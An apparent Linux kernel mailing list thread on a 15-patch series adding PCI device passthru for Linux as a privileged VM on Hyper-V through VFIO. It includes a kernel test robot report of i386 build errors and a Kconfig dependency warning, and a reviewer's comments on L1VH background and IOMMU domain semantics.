From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
Hi Mukesh, kernel test robot noticed the following build warnings: [auto build test WARNING on tip/x86/core] [also build test WARNING on pci/next pci/for-linus arm64/for-next/core clk/clk-next soc/for-next linus/master arnd-asm-generic/master v6.19-rc6 next-20260120] [If your patch is applied to the wrong git tree, kindly drop us a note. And when submitting patch, we suggest to use '--base' as documented in https://git-scm.com/docs/git-format-patch#_base_tree_information] url: https://github.com/intel-lab-lkp/linux/commits/Mukesh-R/iommu-hyperv-rename-hyperv-iommu-c-to-hyperv-irq-c/20260120-145832 base: tip/x86/core patch link: https://lore.kernel.org/r/20260120064230.3602565-2-mrathor%40linux.microsoft.com patch subject: [PATCH v0 01/15] iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c config: i386-allmodconfig (https://download.01.org/0day-ci/archive/20260121/202601210423.wwOrf2K8-lkp@intel.com/config) compiler: gcc-14 (Debian 14.2.0-19) 14.2.0 reproduce (this is a W=1 build): (https://download.01.org/0day-ci/archive/20260121/202601210423.wwOrf2K8-lkp@intel.com/reproduce) If you fix the issue in a separate patch/commit (i.e. not just a new version of the same patch/commit), kindly add following tags | Reported-by: kernel test robot <lkp@intel.com> | Closes: https://lore.kernel.org/oe-kbuild-all/202601210423.wwOrf2K8-lkp@intel.com/ All warnings (new ones prefixed by >>): In file included from drivers/iommu/intel/irq_remapping.c:6: include/linux/dmar.h:269:17: error: unknown type name '__u128'; did you mean '__u32'? 269 | __u128 irte; | ^~~~~~ | __u32 drivers/iommu/intel/irq_remapping.c: In function 'modify_irte': drivers/iommu/intel/irq_remapping.c:181:17: error: unknown type name 'u128' 181 | u128 old = irte->irte; | ^~~~ In file included from arch/x86/include/asm/bug.h:193, from arch/x86/include/asm/alternative.h:9, from arch/x86/include/asm/barrier.h:5, from include/asm-generic/bitops/generic-non-atomic.h:7, from include/linux/bitops.h:28, from include/linux/kernel.h:23, from include/linux/interrupt.h:6, from drivers/iommu/intel/irq_remapping.c:5: include/linux/atomic/atomic-arch-fallback.h:326:14: error: void value not ignored as it ought to be 326 | ___r = raw_cmpxchg128((_ptr), ___o, (_new)); \ | ^ include/asm-generic/bug.h:110:32: note: in definition of macro 'WARN_ON' 110 | int __ret_warn_on = !!(condition); \ | ^~~~~~~~~ include/linux/atomic/atomic-instrumented.h:4956:9: note: in expansion of macro 'raw_try_cmpxchg128' 4956 | raw_try_cmpxchg128(__ai_ptr, __ai_oldp, __VA_ARGS__); \ | ^~~~~~~~~~~~~~~~~~ drivers/iommu/intel/irq_remapping.c:182:26: note: in expansion of macro 'try_cmpxchg128' 182 | WARN_ON(!try_cmpxchg128(&irte->irte, &old, irte_modified->irte)); | ^~~~~~~~~~~~~~ drivers/iommu/intel/irq_remapping.c: In function 'intel_ir_set_vcpu_affinity': 1270 | ~(-1UL << PDA_HIGH_BIT); | ^~ Kconfig warnings: (for reference only) WARNING: unmet direct dependencies detected for IRQ_REMAP Depends on [n]: IOMMU_SUPPORT [=y] && X86_64 [=n] && X86_IO_APIC [=y] && PCI_MSI [=y] && ACPI [=y] Selected by [y]: - HYPERV_IOMMU [=y] && IOMMU_SUPPORT [=y] && HYPERV [=y] && X86 [=y] vim +1270 drivers/iommu/intel/irq_remapping.c b106ee63abccbba drivers/iommu/intel_irq_remapping.c Jiang Liu 2015-04-13 1241 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1242 static int intel_ir_set_vcpu_affinity(struct irq_data *data, void *info) 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1243 { 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1244 struct intel_ir_data *ir_data = data->chip_data; 53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11 1245 struct intel_iommu_pi_data *pi_data = info; 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1246 ed1e48ea4370300 drivers/iommu/intel/irq_remapping.c Jacob Pan 2024-04-23 1247 /* stop posting interrupts, back to the default mode */ 53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11 1248 if (!pi_data) { 2454823e97a63d8 drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-03-19 1249 __intel_ir_reconfigure_irte(data, true); 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1250 } else { 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1251 struct irte irte_pi; 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1252 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1253 /* 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1254 * We are not caching the posted interrupt entry. We 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1255 * copy the data from the remapped entry and modify 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1256 * the fields which are relevant for posted mode. The 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1257 * cached remapped entry is used for switching back to 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1258 * remapped mode. 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1259 */ 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1260 memset(&irte_pi, 0, sizeof(irte_pi)); 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1261 dmar_copy_shared_irte(&irte_pi, &ir_data->irte_entry); 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1262 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1263 /* Update the posted mode fields */ 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1264 irte_pi.p_pst = 1; 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1265 irte_pi.p_urgent = 0; 53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11 1266 irte_pi.p_vector = pi_data->vector; 53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11 1267 irte_pi.pda_l = (pi_data->pi_desc_addr >> 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1268 (32 - PDA_LOW_BIT)) & ~(-1UL << PDA_LOW_BIT); 53527ea1b70224d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-06-11 1269 irte_pi.pda_h = (pi_data->pi_desc_addr >> 32) & 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 @1270 ~(-1UL << PDA_HIGH_BIT); 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1271 688124cc541f60d drivers/iommu/intel/irq_remapping.c Sean Christopherson 2025-03-19 1272 ir_data->irq_2_iommu.posted_vcpu = true; 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1273 modify_irte(&ir_data->irq_2_iommu, &irte_pi); 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1274 } 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1275 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1276 return 0; 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1277 } 8541186faf3b596 drivers/iommu/intel_irq_remapping.c Feng Wu 2015-06-09 1278 -- 0-DAY CI Kernel Test Service https://github.com/intel/lkp-tests/wiki
{ "author": "kernel test robot <lkp@intel.com>", "date": "Wed, 21 Jan 2026 05:09:48 +0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }
lkml
[PATCH v0 00/15] PCI passthru on Hyper-V (Part I)
From: Mukesh Rathor <mrathor@linux.microsoft.com> Implement passthru of PCI devices to unprivileged virtual machines (VMs) when Linux is running as a privileged VM on Microsoft Hyper-V hypervisor. This support is made to fit within the workings of VFIO framework, and any VMM needing to use it must use the VFIO subsystem. This supports both full device passthru and SR-IOV based VFs. There are 3 cases where Linux can run as a privileged VM (aka MSHV): Baremetal root (meaning Hyper-V+Linux), L1VH, and Nested. At a high level, the hypervisor supports traditional mapped iommu domains that use explicit map and unmap hypercalls for mapping and unmapping guest RAM into the iommu subsystem. Hyper-V also has a concept of direct attach devices whereby the iommu subsystem simply uses the guest HW page table (ept/npt/..). This series adds support for both, and both are made to work in VFIO type1 subsystem. While this Part I focuses on memory mappings, upcoming Part II will focus on irq bypass along with some minor irq remapping updates. This patch series was tested using Cloud Hypervisor verion 48. Qemu support of MSHV is in the works, and that will be extended to include PCI passthru and SR-IOV support also in near future. Based on: 8f0b4cce4481 (origin/hyperv-next) Thanks, -Mukesh Mukesh Rathor (15): iommu/hyperv: rename hyperv-iommu.c to hyperv-irq.c x86/hyperv: cosmetic changes in irqdomain.c for readability x86/hyperv: add insufficient memory support in irqdomain.c mshv: Provide a way to get partition id if running in a VMM process mshv: Declarations and definitions for VFIO-MSHV bridge device mshv: Implement mshv bridge device for VFIO mshv: Add ioctl support for MSHV-VFIO bridge device PCI: hv: rename hv_compose_msi_msg to hv_vmbus_compose_msi_msg mshv: Import data structs around device domains and irq remapping PCI: hv: Build device id for a VMBus device x86/hyperv: Build logical device ids for PCI passthru hcalls x86/hyperv: Implement hyperv virtual iommu x86/hyperv: Basic interrupt support for direct attached devices mshv: Remove mapping of mmio space during map user ioctl mshv: Populate mmio mappings for PCI passthru MAINTAINERS | 1 + arch/arm64/include/asm/mshyperv.h | 15 + arch/x86/hyperv/irqdomain.c | 314 ++++++--- arch/x86/include/asm/mshyperv.h | 21 + arch/x86/kernel/pci-dma.c | 2 + drivers/hv/Makefile | 3 +- drivers/hv/mshv_root.h | 24 + drivers/hv/mshv_root_main.c | 296 +++++++- drivers/hv/mshv_vfio.c | 210 ++++++ drivers/iommu/Kconfig | 1 + drivers/iommu/Makefile | 2 +- drivers/iommu/hyperv-iommu.c | 1004 +++++++++++++++++++++------ drivers/iommu/hyperv-irq.c | 330 +++++++++ drivers/pci/controller/pci-hyperv.c | 207 ++++-- include/asm-generic/mshyperv.h | 1 + include/hyperv/hvgdk_mini.h | 11 + include/hyperv/hvhdk_mini.h | 112 +++ include/linux/hyperv.h | 6 + include/uapi/linux/mshv.h | 31 + 19 files changed, 2182 insertions(+), 409 deletions(-) create mode 100644 drivers/hv/mshv_vfio.c create mode 100644 drivers/iommu/hyperv-irq.c -- 2.51.2.vfs.0.1
Hi Mukesh, On Mon, 19 Jan 2026 22:42:15 -0800 Mukesh R <mrathor@linux.microsoft.com> wrote: I think some introduction/background to L1VH would help. It may be clearer to state that the hypervisor supports Linux IOMMU paging domains through map/unmap hypercalls, mapping GPAs to HPAs using stage‑2 I/O page tables. This may warrant introducing a new IOMMU domain feature flag, as it performs mappings but does not support map/unmap semantics in the same way as a paging domain.
{ "author": "Jacob Pan <jacob.pan@linux.microsoft.com>", "date": "Tue, 20 Jan 2026 13:50:32 -0800", "thread_id": "aYDROXpR5kvlylGG@skinsburskii.localdomain.mbox.gz" }